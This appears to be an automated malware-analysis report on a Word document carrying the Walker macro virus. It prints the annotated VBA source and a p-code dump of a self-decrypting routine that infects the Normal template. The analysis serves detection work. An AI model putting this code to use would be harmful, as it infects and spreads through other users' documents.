Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b3a74ee93dd7b085…

MALICIOUS

Office (OLE)

Size: 62.0 KB · Created: 2002-12-10 12:49:00 · Authoring application: Microsoft Word 10.0 · First seen: 2017-03-05
MD5: c7fe9d038222a642ecc26ba54d5c32e0 SHA-1: 14504b38ce4207b5629b40e92218f7e396ea7c9d SHA-256: b3a74ee93dd7b085c0251d9ccec5a337327ae40cc4c96f019a6bf88c6438d9f3
Risk Score: 88

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic · T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code when the document is opened. The macro code is obfuscated: at run time Document_Open XOR-decodes comment lines of its own module into executable statements, calls the procedure that now holds them, and then blanks those lines again. The ClamAV detection 'Doc.Trojan.Walker-9' strongly suggests malicious intent, likely involving the download of a second-stage payload; note, however, that the extracted source shown below contains no download routine in clear text — the visible behaviour is rewriting the VBA module of the Normal template and saving it (NormalTemplate.Save in Document_Close), which looks like template infection, so the second-stage claim should be confirmed from the decoded statements or from dynamic analysis.

Heuristics (3)

  • ClamAV: Doc.Trojan.Walker-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Walker-9
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    On Error Resume Next: W = 0: CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11923 bytes
SHA-256: 8f3921c31cbd47fa843de6c23783c484ecac7e4af1fd1955004162dc4eb5aae8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True









































'Sattelite v1.0
'Document
' Analyst note: single-byte XOR transform. Every character of s is XORed
' with k and re-assembled into the result, so the routine is its own
' inverse (the same call encodes and decodes). Document_Open below feeds it
' the apostrophe-stripped comment lines of ThisDoc with a key (W) that steps
' 2, 4, ..., 20 and wraps. The loop counter f is never declared - the module
' has no Option Explicit - so it is an implicit Variant.
Private Function encr(s, k As Integer)
Dim r: r = "": For f = 1 To Len(s): r = r + Chr((Asc(Mid$(s, f, 1))) Xor k): Next: encr = r
End Function
' Analyst note: self-decoding, self-cleaning entry point. Every line number
' used here (43, 63, 101, 83-100, CountOfLines - 27) indexes the VBA module's
' own stored layout, so the behaviour depends on the exact line positions in
' the sample; annotation lines in this listing are not part of that layout.
Private Sub Document_Open()
' Errors are suppressed for the whole procedure. W is the XOR key counter,
' CH the active document's character count, and Kar = "'" + Str(CH) a
' comment-shaped marker (Str prefixes a space, cf. the "' 4701" line at the
' end of ThisDoc) that is stored at module line 101 and checked again by
' Document_Close.
On Error Resume Next: W = 0: CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH)
' Reads line 43 of the first VBComponent of the Normal template. Per the
' p-code dump (Line #42, zero-based) that position holds the comment
' 'Document in this sample, so the comparison below appears to tell a copy
' that already lives in the template ('NormalTemplate) from the document
' copy - how the code first gets into the template is not visible here.
WhereAmI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(43, 1)
' Iam = the code module that will be rewritten: the Normal template's own
' module if the marker matched, otherwise the active document's.
If WhereAmI = "'NormalTemplate" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule
' Stores the character-count marker at line 101, then walks lines
' 63 .. CountOfLines - 27, i.e. the XOR-obfuscated comment lines inside
' ThisDoc. The key wraps from 20 back to 0 before being bumped to 2.
With Iam: .ReplaceLine 101, Kar: Z = .CountOfLines - 27: For x = 63 To Z:
If W = 20 Then W = 0
' Per cipher line: drop the leading apostrophe (Right$ of Len - 1), XOR with
' the current key, and write the result 20 lines further down (line 83
' onward) - into the bare-apostrophe slots of ThisDoc, which thereby become
' executable statements.
decrypt = .Lines(x, 1): W = W + 2: Y = Len(decrypt): Y = Y - 1: decrypt = Right$(decrypt, Y): .ReplaceLine x + 20, encr(decrypt, (W)): Next x: End With
' Runs the freshly decoded ThisDoc, then scrubs lines 83-100 back to bare
' apostrophes in BOTH modules: first the Normal template (Flag = 0), then,
' via the GoTo Again jump, the active document (Flag = 1), so the decoded
' text is not left in either module.
Call ThisDoc: Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule: Flag = 0: GoTo Over
Again: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule: Flag = 1
Over:
With Iam: For x = 83 To 100: .ReplaceLine x, "'": Next x: End With
If Flag = 0 Then GoTo Again
End Sub
' Analyst note: ThisDoc is the payload container. As stored in the sample its
' body is nothing but comment lines, and every one of them is read or written
' by line number at run time, so none of them is altered here:
'   - the non-empty lines (module lines 63-80 per the p-code dump) are the
'     XOR-obfuscated statements Document_Open decodes with encr;
'   - the run of bare apostrophes after them (lines 81-100) are the slots
'     Document_Open overwrites with the decoded statements before calling
'     this procedure, and blanks again afterwards;
'   - the final "' 4701" line (module line 101) is the character-count marker
'     that Document_Open writes and Document_Close compares.
' The obfuscated text is left undecoded in this listing; its plaintext is
' only ever present in memory between the decode loop and the scrub loop.
Private Sub ThisDoc()
'
'
'Ml"Gppmp"Pgqwog"Lgzv
'Etthmgepmkj*AjefhaGejgahOa}$9$s`Gejgah@mwefha`
'Ivroihu(PotsuVtirceroih&;&@gjuc
'Gx|agf{&[i~mFgzeidXzgex|(5(Nid{m
'Yo~*Ki~Ikxxcox*7*Ki~c|oNei god~$\HZxe`oi~$\HIegzedod~y";#$IenoGen fo
'_ix,Bc~aOm~~ei~,1,Bc~am`Xia|`mxi"ZN\~cfiox"ZNOca|cbibx $=%"OchiAchy`i
'@G.3.@a|cobZkc~bozk XL^|adkmz XLMac~a`k`z}&?' MajkCaj{bk Bg`k}&:<".?'
'QY0-0QsdyfuT se}u~d>FR@b zusd>FRS }` ~u~dc8!9>S tu] te|u>\y~uc8$"<0!9
'[t2GQsaw:\[;2/205ASFFW^[FW2D#<"02Fzw|2\}` [|afs~~wv2/2F`gw2W~aw2\}` [|afs~~wv2/2Ts~aw
']r4AWugq<Z]=4(*463GU@@QX]@Q4B%:$64Uzp4Z{fyWuff}qf:W{az`[rX}zqg4*4$4@|qz4Ql}`4Gav
'Kd"WAcqg*CK+"?" %QCVVGNKVG"T3,2 "Vjgl"CavKlqvcnngf"?"Vpwg"Gnqg"CavKlqvcnngf"?"Dcnqg
'Mb$QGewa,EM-$8:$&#WEPPAHMPA$R5*4&$Ej`$EgpGevvmav*GkqjpKbHmjaw$:$4$Plaj$A|mp$Wqf
'O`&HitkOhurgjjcb&;&Rtsc&Ghb&GerOhurgjjcb&;&Rtsc&Rnch&C~or&Usd
'An(FgzeAf{|iddml(5(Nid{m(\`mf2([m|(Afnmk|agf(5(FgzeKizzamz2([m|(Kizzamz(5(Ik|Kizzamz2(Md{m2([m|(Afnmk|agf(5(Ik|Kizzamz2([m|(Kizzamz(5(FgzeKizzamz
']c~b*Ikxxcox0*\cxIeno*7*$Fcdoy";&*$Ie d~ElFcdoy#0*Odn*]c~b
'[exd,Ebjioxecb6,"Hi`ixi@ebi ,= ,"OcybxCj@ebi 6,"Eb i~x@ebi ,= ,Ze~Ochi
'Gh.@a|cG`}zobbkj.3.Hob}k.Zfk`. \k~bomkBg`k.:=".,)@a|cobZkc~bozk,.Kb}k. \k~bomkBg`k.:=".,)Jam{ck`z,
'U~t0Gydx
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
' 4701
End Sub
' Analyst note: persistence step, run when the document closes. Unlike
' Document_Open it has no On Error Resume Next, so any failure here surfaces.
' The unconditional NormalTemplate.Save is the action a detection rule for
' Normal-template tampering would key on.
Private Sub Document_Close()
' Same line-43 probe and character-count marker as in Document_Open.
WhereAmI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(43, 1): CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH)
' Iam = Normal template module if the marker matched, else the document's.
If WhereAmI = "'NormalTemplate" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule:
' Kar2 = the marker Document_Open stored at line 101; that line is reset to a
' bare apostrophe; the Normal template - whose module Document_Open already
' rewrote - is saved to disk; and if the character count is unchanged since
' open (Kar = Kar2) the active document is re-saved over itself in Word
' document format, so the macro is persisted in the file as well.
Kar2 = Iam.Lines(101, 1): Iam.ReplaceLine 101, "'": NormalTemplate.Save: If Kar = Kar2 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub

' Processing file: /opt/analyzer/scan_staging/e6afa23801d84e478ef4281dd0472d8e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 10337 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' Line #5:
' Line #6:
' Line #7:
' Line #8:
' Line #9:
' Line #10:
' Line #11:
' Line #12:
' Line #13:
' Line #14:
' Line #15:
' Line #16:
' Line #17:
' Line #18:
' Line #19:
' Line #20:
' Line #21:
' Line #22:
' Line #23:
' Line #24:
' Line #25:
' Line #26:
' Line #27:
' Line #28:
' Line #29:
' Line #30:
' Line #31:
' Line #32:
' Line #33:
' Line #34:
' Line #35:
' Line #36:
' Line #37:
' Line #38:
' Line #39:
' Line #40:
' Line #41:
' 	QuoteRem 0x0000 0x000E "Sattelite v1.0"
' Line #42:
' 	QuoteRem 0x0000 0x0008 "Document"
' Line #43:
' 	FuncDefn (Private Function encr(s, k As Integer, id_FFFE As Variant))
' Line #44:
' 	Dim 
' 	VarDefn r
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St r 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld False 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld s 
' 	FnLen 
' 	For 
' 	BoS 0x0000 
' 	Ld r 
' 	Ld s 
' 	Ld False 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Paren 
' 	Ld k 
' 	Xor 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	St r 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Next 
' 	BoS 0x0000 
' 	Ld r 
' 	St encr 
' Line #45:
' 	EndFunc 
' Line #46:
' 	FuncDefn (Private Sub Document_Open())
' Line #47:
' 	OnError (Resume Next) 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	St W 
' 	BoS 0x0000 
' 	Ld Word 
' 	MemLd ActiveDocument 
' 	MemLd Characters 
' 	MemLd Count 
' 	St CH 
' 	BoS 0x0000 
' 	LitStr 0x0001 "'"
' 	Ld CH 
' 	ArgsLd Str 0x0001 
' 	Add 
' 	St Kar 
' Line #48:
' 	LitDI2 0x002B 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St WhereAmI 
' Line #49:
' 	Ld WhereAmI 
' 	LitStr 0x000F "'NormalTemplate"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Iam 
' 	Else 
' 	BoSImplicit 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Iam 
' 	EndIf 
' Line #50:
' 	StartWithExpr 
' 	Ld Iam 
' 	With 
' 	BoS 0x0000 
' 	LitDI2 0x0065 
' 	Ld Kar 
' 	ArgsMemCallWith ReplaceLine 0x0002 
' 	BoS 0x0000 
' 	MemLdWith CountOfLines 
' 	LitDI2 0x001B 
' 	Sub 
' 	St Z 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	LitDI2 0x003F 
' 	Ld Z 
' 	For 
' 	BoS 0x0000 
' Line #51:
' 	Ld W 
' 	LitDI2 0x0014 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0000 
' 	St W 
' 	EndIf 
' Line #52:
' 	Ld x 
' 	LitDI2 0x0001 
' 	ArgsMemLdWith Lines 0x0002 
' 	St decrypt 
' 	BoS 0x0000 
' 	Ld W 
' 	LitDI2 0x0002 
' 	Add 
' 	St W 
' 	BoS 0x0000 
' 	Ld decrypt 
' 	FnLen 
' 	St Y 
' 	BoS 0x0000 
' 	Ld Y 
' 	LitDI2 0x0001 
' 	Sub 
' 	St Y 
' 	BoS 0x0000 
' 	Ld decrypt 
' 	Ld Y 
' 	ArgsLd Right$ 0x0002 
' 	St decrypt 
' 	BoS 0x0000 
' 	Ld x 
' 	LitDI2 0x0014 
' 	Add 
' 	Ld decrypt 
' 	Ld W 
' 	Paren 
' 	ArgsLd encr 0x0002 
' 	ArgsMemCallWith ReplaceLine 0x0002 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	NextVar 
' 	BoS 0x0000 
' 	EndWith 
' Line #53:
' 	ArgsCall (Call) ThisDoc 0x0000 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Iam 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	St Flag 
' 	BoS 0x0000 
' 	GoTo Over 
' Line #54:
' 	Label Again 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Iam 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	St Flag 
' Line #55:
' 	Label Over 
' Line #56:
' 	StartWithExpr 
' 	Ld Iam 
' 	With 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	LitDI2 0x0053 
' 	LitDI2 0x0064 
' 	For 
' 	BoS 0x0000 
' 	Ld x 
' 	LitStr 0x0001 "'"
' 	ArgsMemCallWith ReplaceLine 0x0002 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	NextVar 
' 	BoS 0x0000 
' 	EndWith 
' Line #57:
' 	Ld Flag 
' 	LitDI2 0x0000 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo Again 
' 	EndIf 
' Line #58:
' 	EndSub 
' Line #59:
' 	FuncDefn (Private Sub ThisDoc())
' Line #60:
' 	QuoteRem 0x0000 0x0000 ""
' Line #61:
' 	QuoteRem 0x0000 0x0000 ""
' Line #62:
' 	QuoteRem 0x0000 0x0014 "Ml"Gppmp"Pgqwog"Lgzv"
' Line #63:
' 	QuoteRem 0x0000 0x002E "Etthmgepmkj*AjefhaGejgahOa}$9$s`Gejgah@mwefha`"
' Line #64:
' 	QuoteRem 0x0000 0x001F "Ivroihu(PotsuVtirceroih&;&@gjuc"
' Line #65:
' 	QuoteRem 0x0000 0x0020 "Gx|agf{&[i~mFgzeidXzgex|(5(Nid{m"
' Line #66:
' 	QuoteRem 0x0000 0x0044 "Yo~*Ki~Ikxxcox*7*Ki~c|oNei god~$\HZxe`oi~$\HIegzedod~y";#$IenoGen fo"
' Line #67:
' 	QuoteRem 0x0000 0x0045 "_ix,Bc~aOm~~ei~,1,Bc~am`Xia|`mxi"ZN\~cfiox"ZNOca|cbibx $=%"OchiAchy`i"
' Line #68:
' 	QuoteRem 0x0000 0x0045 "@G.3.@a|cobZkc~bozk XL^|adkmz XLMac~a`k`z}&?' MajkCaj{bk Bg`k}&:<".?'"
' Line #69:
' 	QuoteRem 0x0000 0x0045 "QY0-0QsdyfuT se}u~d>FR@b zusd>FRS }` ~u~dc8!9>S tu] te|u>\y~uc8$"<0!9"
' Line #70:
' 	QuoteRem 0x0000 0x0055 "[t2GQsaw:\[;2/205ASFFW^[FW2D#<"02Fzw|2\}` [|afs~~wv2/2F`gw2W~aw2\}` [|afs~~wv2/2Ts~aw"
' Line #71:
' 	QuoteRem 0x0000 0x0050 "]r4AWugq<Z]=4(*463GU@@QX]@Q4B%:$64Uzp4Z{fyWuff}qf:W{az`[rX}zqg4*4$4@|qz4Ql}`4Gav"
' Line #72:
' 	QuoteRem 0x0000 0x0053 "Kd"WAcqg*CK+"?" %QCVVGNKVG"T3,2 "Vjgl"CavKlqvcnngf"?"Vpwg"Gnqg"CavKlqvcnngf"?"Dcnqg"
' Line #73:
' 	QuoteRem 0x0000 0x004F "Mb$QGewa,EM-$8:$&#WEPPAHMPA$R5*4&$Ej`$EgpGevvmav*GkqjpKbHmjaw$:$4$Plaj$A|mp$Wqf"
' Line #74:
' 	QuoteRem 0x0000 0x003D "O`&HitkOhurgjjcb&;&Rtsc&Ghb&GerOhurgjjcb&;&Rtsc&Rnch&C~or&Usd"
' Line #75:
' 	QuoteRem 0x0000 0x0091 "An(FgzeAf{|iddml(5(Nid{m(\`mf2([m|(Afnmk|agf(5(FgzeKizzamz2([m|(Kizzamz(5(Ik|Kizzamz2(Md{m2([m|(Afnmk|agf(5(Ik|Kizzamz2([m|(Kizzamz(5(FgzeKizzamz"
' Line #76:
' 	QuoteRem 0x0000 0x003A "]c~b*Ikxxcox0*\cxIeno*7*$Fcdoy";&*$Ie d~ElFcdoy#0*Odn*]c~b"
' Line #77:
' 	QuoteRem 0x0000 0x0046 "[exd,Ebjioxecb6,"Hi`ixi@ebi ,= ,"OcybxCj@ebi 6,"Eb i~x@ebi ,= ,Ze~Ochi"
' Line #78:
' 	QuoteRem 0x0000 0x0062 "Gh.@a|cG`}zobbkj.3.Hob}k.Zfk`. \k~bomkBg`k.:=".,)@a|cobZkc~bozk,.Kb}k. \k~bomkBg`k.:=".,)Jam{ck`z,"
' Line #79:
' 	QuoteRem 0x0000 0x0008 "U~t0Gydx"
' Line #80:
' 	QuoteRem 0x0000 0x0000 ""
' Line #81:
' 	QuoteRem 0x0000 0x0000 ""
' Line #82:
' 	QuoteRem 0x0000 0x0000 ""
' Line #83:
' 	QuoteRem 0x0000 0x0000 ""
' Line #84:
' 	QuoteRem 0x0000 0x0000 ""
' Line #85:
' 	QuoteRem 0x0000 0x0000 ""
' Line #86:
' 	QuoteRem 0x0000 0x0000 ""
' Line #87:
' 	QuoteRem 0x0000 0x0000 ""
' Line #88:
' 	QuoteRem 0x0000 0x0000 ""
' Line #89:
' 	QuoteRem 0x0000 0x0000 ""
' Line #90:
' 	QuoteRem 0x0000 0x0000 ""
' Line #91:
' 	QuoteRem 0x0000 0x0000 ""
' Line #92:
' 	QuoteRem 0x0000 0x0000 ""
' Line #93:
' 	QuoteRem 0x0000 0x0000 ""
' Line #94:
' 	QuoteRem 0x0000 0x0000 ""
' Line #95:
' 	QuoteRem 0x0000 0x0000 ""
' Line #96:
' 	QuoteRem 0x0000 0x0000 ""
' Line #97:
' 	QuoteRem 0x0000 0x0000 ""
' Line #98:
' 	QuoteRem 0x0000 0x0000 ""
' Line #99:
' 	QuoteRem 0x0000 0x0000 ""
' Line #100:
' 	QuoteRem 0x0000 0x0005 " 4701"
' Line #101:
' 	EndSub 
' Line #102:
' 	FuncDefn (Private Sub Document_Close())
' Line #103:
' 	LitDI2 0x002B 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St WhereAmI 
' 	BoS 0x0000 
' 	Ld Word 
' 	MemLd ActiveDocument 
' 	MemLd Characters 
' 	MemLd Count 
' 	St CH 
' 	BoS 0x0000 
' 	LitStr 0x0001 "'"
' 	Ld CH 
' 	ArgsLd Str 0x0001 
' 	Add 
' 	St Kar 
' Line #104:
' 	Ld WhereAmI 
' 	LitStr 0x000F "'NormalTemplate"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Iam 
' 	Else 
' 	BoSImplicit 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Iam 
' 	BoS 0x0000 
' 	EndIf 
' Line #105:
' 	LitDI2 0x0065 
' 	LitDI2 0x0001 
' 	Ld Iam 
' 	ArgsMemLd Lines 0x0002 
' 	St Kar2 
' 	BoS 0x0000 
' 	LitDI2 0x0065 
' 	LitStr 0x0001 "'"
' 	Ld Iam 
' 	ArgsMemCall ReplaceLine 0x0002 
' 	BoS 0x0000 
' 	Ld NormalTemplate 
' 	ArgsMemCall Save 0x0000 
' 	BoS 0x0000 
' 	Ld Kar 
' 	Ld Kar2 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed FileName 
' 	Ld wdFormatDocument 
' 	ParamNamed FileFormat 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0002 
' 	EndIf 
' Line #106:
' 	EndSub